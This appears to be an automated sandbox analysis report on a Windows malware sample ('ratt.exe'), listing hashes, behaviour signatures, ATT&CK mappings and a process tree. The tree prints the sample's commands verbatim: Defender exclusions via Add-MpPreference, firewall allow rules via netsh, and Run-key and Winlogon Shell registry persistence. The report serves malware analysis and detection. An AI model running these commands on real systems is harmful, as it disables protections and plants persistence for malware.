Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
76s -
max time network
105s -
platform
windows10-1703_x64 -
resource
win10-20230703-en -
resource tags
-
submitted
31/08/2023, 09:13
General
-
Target
e083558fd6f597588891ab7f3afee4d4e933813eefa5024f55f1ce7d393be9fe.exe
-
Size
1.4MB
-
MD5
02c4e8b163950ab8b5a9b478176ed54b
-
SHA1
ca5dd745d34b74519d66475549a165f4c7fb2a16
-
SHA256
e083558fd6f597588891ab7f3afee4d4e933813eefa5024f55f1ce7d393be9fe
-
SHA512
bfdfd4d6809c693d4c0f73bd5a41124ef719f65764a56df2df7c844d1ba37a2dabddd3c66c76765ccd838a35de7bdab43924ebe2e683a702361b800bd79b1941
-
SSDEEP
24576:U2G/nvxW3Ww0tRp8GiXTBhq7yRDvHcUcjUvy0lr3Tl6icOB/UWoT:UbA30H4zF0UMSAicOB/UWk
Malware Config
Signatures
-
Modifies Windows Firewall 1 TTPs 2 IoCs
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 1 IoCs
-
UPX packed file 7 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Unexpected DNS network traffic destination 3 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
-
Adds Run key to start application 2 TTPs 1 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs ping.exe 1 TTPs 4 IoCs
-
Suspicious behavior: EnumeratesProcesses 36 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Views/modifies file attributes 1 TTPs 1 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\e083558fd6f597588891ab7f3afee4d4e933813eefa5024f55f1ce7d393be9fe.exe"C:\Users\Admin\AppData\Local\Temp\e083558fd6f597588891ab7f3afee4d4e933813eefa5024f55f1ce7d393be9fe.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ratt.bat" "2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c nslookup myip.opendns.com. resolver1.opendns.com3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\nslookup.exenslookup myip.opendns.com. resolver1.opendns.com4⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c wmic ComputerSystem get Domain3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic ComputerSystem get Domain4⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionPath "$Env:SystemDrive\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePowershell -Command 'Add-MpPreference -ExclusionProcess "C:\Users\Admin\AppData\Local\Temp\ratt.exe"'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\7z.exe7z.exe x -o"C:\Users\Admin\AppData\Local\Temp" -y ratt.7z3⤵
- Executes dropped EXE
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -executionpolicy RemoteSigned -WindowStyle Hidden -file Add.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=in action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\netsh.exe"C:\Windows\system32\netsh.exe" advfirewall firewall add rule name=SecuritySystem dir=out action=allow "program=C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" enable=yes4⤵
- Modifies Windows Firewall
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic computersystem where name="CXVLSGIX" set AutomaticManagedPagefile=False5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic pagefileset where name="C:\\pagefile.sys" set InitialSize=15000,MaximumSize=200005⤵
-
-
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 6 > nul && REG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 66⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /f /v "Shell" /t REG_SZ /d "explorer.exe,C:\Users\Admin\Music\rot.exe,"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 20 > nul && "C:\Users\Admin\Music\rot.exe"5⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 206⤵
- Runs ping.exe
-
-
-
-
C:\Windows\SysWOW64\attrib.exe"C:\Windows\system32\attrib.exe" +h "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ratt.exe"4⤵
- Views/modifies file attributes
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "ratt" /t REG_SZ /d "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ratt.exe" /F3⤵
- Adds Run key to start application
-
-
C:\Users\Admin\AppData\Local\Temp\ratt.exe"ratt.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 9 > nul && copy "C:\Users\Admin\AppData\Local\Temp\ratt.exe" "C:\Users\Admin\Music\rot.exe" && ping 127.0.0.1 -n 9 > nul && "C:\Users\Admin\Music\rot.exe"4⤵
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 95⤵
- Runs ping.exe
-
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 95⤵
- Runs ping.exe
-
-
C:\Users\Admin\Music\rot.exe"C:\Users\Admin\Music\rot.exe"5⤵
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"6⤵
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
268.1MB
MD56eccfffa6586e2d1e492dd537a0f3e91
SHA189882f58f1b5d1ed8f041256594adc859e50b4ff
SHA2566d9d9b3992cb4142b4b37f02a823054655247b5c9b194d68da7b5dbcc62df41a
SHA5126846943f47e64119a1d8a405e0e38ac12b7e74c20b9702482f074433e417eace2bce54825cbc625e1f2b49832d65e066864b62404d38d4fa0cae1f6e9474b3c6
-
Filesize
206.9MB
MD572f6bdbaf664d3b955b093d5813b8b81
SHA1b6cce919fe911e27fca298c31f24c06b92599f6f
SHA2561944b553ff18edbd0579edf36c9345011a485805f0b70d301a3911bab5823ed2
SHA512c772dcdf20dc2000558125e0428aa95294c4dffd592f5760d30d0ed84e72bccfa3f19764e83507e737952466f9f6f70af79d76fb72afcb5adc50281b7e53c682
-
Filesize
1KB
MD50f5cbdca905beb13bebdcf43fb0716bd
SHA19e136131389fde83297267faf6c651d420671b3f
SHA256a99135d86804f5cf8aaeb5943c1929bd1458652a3318ab8c01aee22bb4991060
SHA512a41d2939473cffcb6beb8b58b499441d16da8bcc22972d53b8b699b82a7dc7be0db39bcd2486edd136294eb3f1c97ddd27b2a9ff45b831579cba6896d1f776b0
-
Filesize
1KB
MD59e104e9aa0cfdec0753de24cbe3f587b
SHA1f63b8d0b29c65e518be6a9412e7499c9de11be78
SHA25659a9f13de0e003ea4adcd0193477f147b0c91ae847eebc744e91a4efe167223f
SHA5128253854159ceac2d84eb371c9672730831505dea52ac3bc2cca45ee5308717ca3f11734602d0a409974b137084a8c20e6b7653640991e45708f692c65ac4933b
-
Filesize
12KB
MD56338741f8fd49152b6e1d7e798cb6cd5
SHA1001e691733bf9900ce6c26646b0f52397dc192fb
SHA25610b5a04cde27412c0dd5de070217fba92c79c5ba9ff4c2b02dbf5ab1b934bd5f
SHA51239d05964de783c058422cf0f2c36ae68a01eda5c1a2bc837ec8e310060c71a62a5e2b953245fa648556e331ae9bbae7d1a3690f4a9ab7dc446f5b1928420ab72
-
Filesize
12KB
MD50d3d98330463a627293accdb7c7c9893
SHA172077b773cb7985d4825eb818ec345cad9ab7a7b
SHA256084fa0412ee2eba164974c6df0333ce48220ee726a6a76573a8011f333bcf751
SHA512c29511a187d033cf2b4ef6355366493f4be7c267e612a4110cd5735fe781c396db916288756c57ae46ff45741d92eb104cc95ddc63e3a950836a1dd6b8468f12
-
Filesize
12KB
MD5bedebc9baab4a419ca5cbbe125609fc5
SHA166227718a9d870dfedd10581daccfb897a2dbd27
SHA25643dd0e5c3af2c5c5f4897bd0041111337b3f5df923c4592f281436d873b35177
SHA512c456a948d025a5abbf42d52f7d8afefae67d909bd7a93444aed2dfe71ddaa144e777c5eda61303b985869e18d82c9a9c630d0e1a91cf0709b5851478ea3a27cc
-
Filesize
12KB
MD5868a7bc6803e32e1129c55848b5dc0ca
SHA11a342c5aae7a3376f195f55b355aecedc126c16f
SHA2565817fec9a85d0d51fdb140f82b4fcff670f2a3a926325c842c073b8bf87988b5
SHA512d91afe6e3b1db8a7eb42015ea25a3e650969f8efc8f4f4a896052b7858df1f51eeda2d6b59f0cc1ac662316a52e0efe6d2b534bc7e29d2c036aacb2220101bc1
-
Filesize
12KB
MD59a75653d2cf6b66d4cdb2279e3eed6e4
SHA1bfc5bae411ee87d47d9d94351d0d0d28c6086b23
SHA2565486482a44e5ce257eb4c96000dedf6d30d8159eaa0b1f3e4332ea694ce3b944
SHA5127bf2cb914402544bb2a7a82f9b4033143a0540becc4d0b0ce8dafbaa18cbd4371d04e75d60b8a97f6154b399c217747cf9501df4ce1faa451909a29846f31564
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
71KB
MD58ba2e41b330ae9356e62eb63514cf82e
SHA18dc266467a5a0d587ed0181d4344581ef4ff30b2
SHA256ea2ad8d87b79c8eb3952498c7005a195986436cfd7ca7736dbbdda979142daea
SHA5122fdfc2d368c70320b3dac00fef06381ef90a2a82a1f3137109b033d84e5b70185039af6ec918012dc03bc9d046cd8d8aee3247ba0f59d394e78f1f73380f7a1d
-
Filesize
1KB
MD50df43097e0f0acd04d9e17fb43d618b9
SHA169b3ade12cb228393a93624e65f41604a17c83b6
SHA256c8e4a63337a25f55f75ad10ab2b420d716bad4b35a2044fd39dcd5936419d873
SHA51201ae71dd2ee040baad6f4b9afcfbaeca2b9f6cc7d60ade5de637238d65c17d74292734666f4ae6b533f6bf1007c46387d8e690d97c3b7a535bcd6f216e70c4fb
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
693KB
MD57de6fdf3629c73bf0c29a96fa23ae055
SHA1dcb37f6d43977601c6460b17387a89b9e4c0609a
SHA256069979bfb2aefe3cac239fe4f2477672eb75b90c9853fb67b2ac1438f2ec44ff
SHA512d1ef2299aacf429572fd6df185009960e601e49126f080fdced26ec407e5db86eaa902e474635464aac146b7de286667a398f2c5e46c4a821dad2579bfb3acf8
-
Filesize
1KB
MD57ea1fec84d76294d9256ae3dca7676b2
SHA11e335451d1cbb6951bc77bf75430f4d983491342
SHA2569a419095c0bafc6b550f3f760c7b4f91ef3a956cfa6403d3750164ecdbe35940
SHA512ab712c45081b3d1c7edd03e67a8db1518a546f3fbf00e99838dfe03a689c4867a6953e6603dcd2be458b2441f4a2b70286fd7d096549cfcf032dd2cd54d68317
-
Filesize
613.3MB
MD564d879d6c7126ffe7ba6398e4d45eb7e
SHA152539589c47fb014683e89781b781e3d8edcf3aa
SHA256abf5abf5630d794fac3a73e9bf06be891f92b2e608e0a4d49e897c74eceafa6c
SHA5128ab5b247b11ebf91e3637f8179fc60325b772a2961477b17982ca13af21e448b59b8acf9ddccb759283a698ffc84c122f545dbe369a9c450be036c32518fb891
-
Filesize
188.0MB
MD510fa5531afe555d361854c966d7eb64f
SHA1dd901aff749ac1fa719478bb662dec3b63acbb38
SHA25662a1ff02fed49deeaad1395b0c62720a6d88d8fae3700624c449ed503a0dfa11
SHA5121fb37263ce54e8a3585588e52dd97a9f27dcc9e4f14714bd473a0d96eeae1b42cb12a3aea44827a23d7398144c0c0997d70e019d2ecad811f2c521e0b1f3223f
-
Filesize
142.9MB
MD565eed7d3b785852065ae9a8e7ee707c5
SHA1733a7dd1c00929de79efc064ed1240bef24e0c27
SHA256065951a00894c405fb9ee2404921ed8afda4bfb10c214bd11029e42d246ab863
SHA5124fec67bc82751d32300a36e2ce7018bce57a628ba74a0f663dedc7cca76742e46af9bb7156ff3ec728b729705430449aca1e552db546f29c1f41f60b5c4c109b
-
Filesize
65.3MB
MD53b6f11de1cb39fae62e1eb20b1431629
SHA14fdc3b7d893b338f51fffb1b411b06b2055af5ab
SHA2569ea9a6a1acad1e08703277ad309e2c80f06380a6fa7089f59b7a904a90509668
SHA512240365c160fcefce717ad58b168f1bfc3a2e2dc8f7e62fdc2d9345ee7a163a7a8d17a2fa8ae2f1f9e4f2208371870c8e83a96ce2583c2443f6c499974b3724ca
-
Filesize
65.6MB
MD5d707e7183e495b649b39fa299ba02764
SHA1af903578b181f8751aeae4aacb4a46850eb8951f
SHA2566e6c3e57976c994f1ddd7f3e872e87b2ddc68d1cc7a2e87a850a07afeda35cad
SHA5128e47507ba2787c0aa9a57fee1edb6152676ce6ee4b3b5bfeeb5862446e11832c6101240301791d47a6f00c20be60122b0e2c19e56571312d026dca14b8bce64a
-
Filesize
328KB
MD515bbbe562f9be3e5dcbb834e635cc231
SHA17c01cf5fa4db2312c5ed2f7b8c41e3e5c346a51a
SHA256ed50ef8e0b6dd83fb0c3f733329d4aa6e5a3beb3491e2ba9d2ae206813508dde
SHA512769287951b8c16f4b10c1b58e82612844babe7b5c10445fe848d713fb5e8321bcbbd9780e9c564cffe35ea4144e8a7e19645291c4eea372fcaa19ae395a97287
-
Filesize
624KB
-
Filesize
64KB
-
Filesize
40KB
-
Filesize
280KB
-
Filesize
584KB
-
Filesize
1.7MB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
904KB
-
Filesize
200KB
-
Filesize
200KB
-
Filesize
6.2MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
472KB
-
Filesize
300KB
-
Filesize
112KB
-
Filesize
6.9MB
-
Filesize
3.3MB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
216KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
136KB
-
Filesize
408KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.9MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
6.5MB
-
Filesize
136KB
-
Filesize
5.0MB
-
Filesize
104KB
-
Filesize
32KB
-
Filesize
104KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
592KB
-
Filesize
64KB
-
Filesize
660KB
-
Filesize
120KB
-
Filesize
204KB
-
Filesize
64KB
-
Filesize
6.9MB
-
Filesize
300KB
-
Filesize
3.3MB